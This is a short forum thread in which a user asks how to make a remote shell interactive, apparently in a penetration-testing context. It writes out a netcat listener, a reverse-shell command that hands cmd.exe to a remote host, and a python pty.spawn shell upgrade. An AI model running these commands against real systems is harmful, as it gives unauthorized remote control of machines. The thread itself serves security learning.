Results 1 to 2 of 2

Thread: Interactive remote shell

Threaded View

  1. #1
    Junior Member
    Join Date
    Jun 2012
    Location
    127.0.0.1
    Posts
    25

    Default Interactive remote shell

    Hi all,
    since I learned "how to land a shell" the problem was about the interactivity of this shell.
    If i setup a netcat listener and then connect to it I can get a simple shell:
    Code:
    nc -lvp 4444
    Code:
    nc 10.0.0.1 4444 -e cmd.exe
    The result is a simple shell, whitout interaction. I can run single command like ping, hostname, dir or net user but i can't run interactive commands like ftp or runas.
    The problems is the same using windows or linux as target.

    Yes, we can use several workarounds like ftp -s option, or calling a python function
    Code:
    python -c 'import pty; pty.spawn("/bin/bash");'
    but what is the best way?

    The solutions I found are socat (on linux) and a stand alone telnet server for windows.

    Anyone with different ways?
    Last edited by SilicaG; 03-04-2013 at 12:55 PM.

Similar Threads

  1. Session is not interactive
    By LaPlaga in forum Beginners Forum
    Replies: 0
    Last Post: 04-12-2011, 09:41 PM
  2. Replies: 21
    Last Post: 03-02-2011, 07:06 PM
  3. interactive script help
    By mroy1300 in forum Beginners Forum
    Replies: 1
    Last Post: 09-07-2010, 07:53 AM
  4. Interactive Packet Replay
    By knickfan5745 in forum Beginners Forum
    Replies: 4
    Last Post: 04-13-2010, 06:19 PM
  5. netcat bind+remote shell hangs out
    By bluerratiq in forum OLD Newbie Area
    Replies: 0
    Last Post: 03-30-2009, 04:36 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •